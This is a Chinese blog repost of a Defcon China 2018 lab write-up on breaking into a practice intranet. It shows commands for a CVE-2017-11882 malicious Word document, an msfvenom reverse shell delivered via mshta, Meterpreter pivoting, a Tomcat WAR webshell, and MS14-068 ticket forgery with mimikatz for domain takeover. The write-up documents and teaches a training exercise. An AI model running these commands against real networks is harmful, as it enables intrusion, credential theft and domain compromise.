Defcon China 靶场题 - 内网渗透Writeup

于 2018-05-12 17:32:00 发布
阅读量465 收藏
点赞数
原文链接:http://www.cnblogs.com/iamstudy/articles/2018_defcon_china_pentest_writeup.html
版权

对内网渗透的题目挺感兴趣的,所以做了一发。

先给个拓扑图

804631-20180512172456468-1716335401.jpg

1. wordpress

http://192.168.1.2/是一个wordpress

文件上传: http://192.168.1.2/wp-content/uploads/
后台可admin/admin登录
ssh可root/admin登录

804631-20180512172532045-822895625.jpg

2. word cve钓鱼

从配置中看到有个文档web的配置

804631-20180512172547293-751690790.jpg

http的log日志可以看到,也有一个bot每隔一段时间会去请求report.doc

804631-20180512172606305-11442343.jpg

尝试用CVE-2017-11882打一波

1、由于环境问题,先做ssh的端口转发
ssh -CfNg -R 13339:127.0.0.1:13338 root@192.168.1.2

2、生成一个hta文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.2 lport=13339 -f hta-psh -o a.hta

3、生成恶意doc文件
python Command43b_CVE-2017-11882.py -c "mshta http://192.168.1.2:8000/a.hta" -o test.doc

4、msf监听端口上线
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 13338
exploit -j

进入了192.168.2.1/24段

804631-20180512172621564-1450253595.jpg

Get Flag.

804631-20180512172634262-1915877059.jpg

3.tomcat

添加路由
run autoroute -s 192.168.2.1/24

进行端口扫描
use auxiliary/scanner/portscan/tcp
set PORTS 3389,445,22,80,8080
set RHoSTS 192.168.2.1/24
set THREADS 50
exploit

由于msf是s4代理,还很慢,就使用ew来做

先上传一下ew
meterpreter > upload /media/psf/Home/ew.exe c:/Users/RTF/Desktop/

linux,192.168.1.2做监听
./ew_for_linux64 -s rcsocks -l 10080 -e 8881

windows,192.168.2.114反向连接
c:/Users/RTF/Desktop/ew.exe -s rssocks -d 192.168.1.2 -e 8881

对内网的192.168.2.104的web进行测试,但是没测出什么.

804631-20180512172652465-1954258269.jpg

但是8080存在tomcat,默认账号密码可以进入,然后部署war包获得一个root权限的webshell

804631-20180512172705916-566204781.jpg

还有一个flag在/var/www/flag,另外翻到数据库密码,连接进去看是有一个提示.

/var/www/html/inc/config.php:

$DB=new MyDB("127.0.0.1","mail","mail123456","my_mail");

804631-20180512172721450-1607387124.jpg

4.pc windows

爆破一发,发现可以进入192.168.2.112

804631-20180512172735753-1783786801.jpg

做了端口转发登录3389,然后以管理员权限执行木马,上线

804631-20180512172748060-377140700.jpg

这里有一个问题就是,一开始只是拿到域内机器的本地administrator权限,所以net user /domain是无法给域控发送一些请求信息,但是提升到system权限即可。

5.dc windows

看了一下pc机器的进程,发现是有域用户在上面。

804631-20180512172805110-152891937.jpg

抓一下明文密码

804631-20180512172820494-413003991.jpg

可以看到pc用户只是一个普通域用户

804631-20180512172839962-984061712.jpg

这里吐槽一下...赛题居然都不复现一下,一开始都没有任何域用户的提示信息,这个pc用户都是后面加上去的。

确认一下域控位置是为\DC,因为remark备注了,所以比较明显

804631-20180512173053453-814250026.jpg

然后就是试一下ms14-068

使用方法:
ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码

MS14-068.exe -u pc@ad.com -s S-1-5-21-2251846888-1669908150-1970748206-1116 -d 192.168.2.10 -p admin@test.COM

其中域成员ad/pc的sid获取,先把进程切换了到了ad/pc权限下面,当然如果只是本地账号权限的话,可以用dsquery + dsget获取,另外注意域成员名@域名,后面的域名必须使用完整dns名称。

804631-20180512173113658-1147554641.jpg

然后用mimikatz把凭证清空一下

mimikatz.exe "kerberos::purge" "kerberos::list" "exit"

然后注入一下凭证

mimikatz.exe "kerberos::ptc TGT_pc@ad.com.ccache"

最后获取flag

804631-20180512173132188-1634291356.jpg

转载于:https://www.cnblogs.com/iamstudy/articles/2018_defcon_china_pentest_writeup.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值